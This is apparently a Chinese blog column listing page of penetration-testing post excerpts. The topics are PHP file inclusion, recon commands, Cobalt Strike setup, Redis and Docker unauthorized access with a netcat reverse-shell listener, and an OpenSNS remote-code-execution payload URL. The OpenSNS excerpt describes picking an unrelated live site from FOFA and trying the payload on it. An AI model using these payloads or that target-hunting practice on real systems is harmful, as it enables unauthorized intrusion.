渗透
文章平均质量分 61
jing!
这个作者很懒,什么都没留下…
展开
-
文件包含include的奇淫技巧长期更新ing
前言demo其实include这个函数人人都知道,php的漏洞大多数来源于几个危险函数,这次先讲解include后面会讲解更多用法.<?php$a = $_GET['a'];include($a);?>1include文件包含漏洞windos c:\windows\System32\drivers\etc\hostslinux /etc/passwd2图片????图片????简单来说就是上传一个木马但是后缀是jpg或者png,但是include函数执行时无视后原创 2021-09-01 17:36:13 · 392 阅读 · 1 评论 -
渗透测试篇
信息收集1. DNS域传送漏洞dnsenum url -f /dns.txt --dnsserver 114.114.114.114 dnsenum.pl VERSION:1.2.32.备案号查询www.beianbeian.com3.ssl证书https://myssl.com/ssl.htmlhttps://www.chinassl.net/ssltools/ssl-checker.html4.Google搜索c段inurl: url intext:管理后台site原创 2021-11-02 21:19:21 · 3189 阅读 · 0 评论 -
后渗透技巧-
查看域信息net group /domain #查看域内所有用户列表net group “domain computers” /domain #查看域成员计算机列表net group “domain admins” /domain #查看域管理员用户msf更新apt-get updateapt-get install metasploit-frameworksudo gem install bundlersudo gem update --systemsudo apt-get inst原创 2021-10-11 10:23:47 · 314 阅读 · 0 评论 -
一次渗透测试......OpenSNS的漏洞
fofa上直接找,找到某倒霉的站。直接搜索OpenSNSv 6.2首先开始试一试前台rceindex.php?s=weibo/share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[method]=-%3E_validationFieldItem%26id[status]=1%26id[4]=function%26id[1]=assert%26id[args]=jiang=phpinfo()%26id原创 2021-08-09 20:50:07 · 1394 阅读 · 0 评论 -
后渗透工具RedTeam-cobaltstrike搭建教程踩坑
工具下载地址https://github.com/makoto56/cobaltstrike-4.2-cn为什么说是踩坑,首先下载完成之后我把kali当成服务机,win10系统当成攻击机,进行环境搭建。kali服务机(ifconfig)-192.168.0.180**第一个坑**,授权问题先进入目录执行命令,密码随便设,笔者设为123456sudo ./teamserver 192.168.0.180 123456 发现没有权限,执行chmod 777 teamserver 进行授原创 2021-08-02 11:51:40 · 623 阅读 · 0 评论 -
redis未授权访问
1.种????尝试连接Redis默认端口号:6379:默认配置端口号26379:sentinel.conf配置器端口攻击机:cente os 7 ip 192.168.30.101靶机kali 2020.3 ip 192.168.30.100因为cente os上面装的redis 6.0版本没有历史漏洞,所以我们从这个kali当靶机进行渗透,原理都一样。进入redis-6.0.6目录下redis-server /etc/redis.conf启动服务同理kali也原创 2021-07-24 16:17:21 · 198 阅读 · 1 评论 -
docker未授权访问反弹shell
标题docker未授权访问反弹shell首先我们要扫描端口“2375“发现目标端口2375开放,尝试访问ip:2375/version目标靶机ip:192.168.30.101 (cente os 7)攻击kali ip: 192.168.30.100 (kali2020.3)访问出现版本泄露而且2375端口开放说明有未授权访问漏洞在kali上开启监听1111端口**nc -lvp 1111**输入以下命令 ip为目标ipdocker -H tcp://192.168.30.10原创 2021-07-23 17:28:23 · 510 阅读 · 1 评论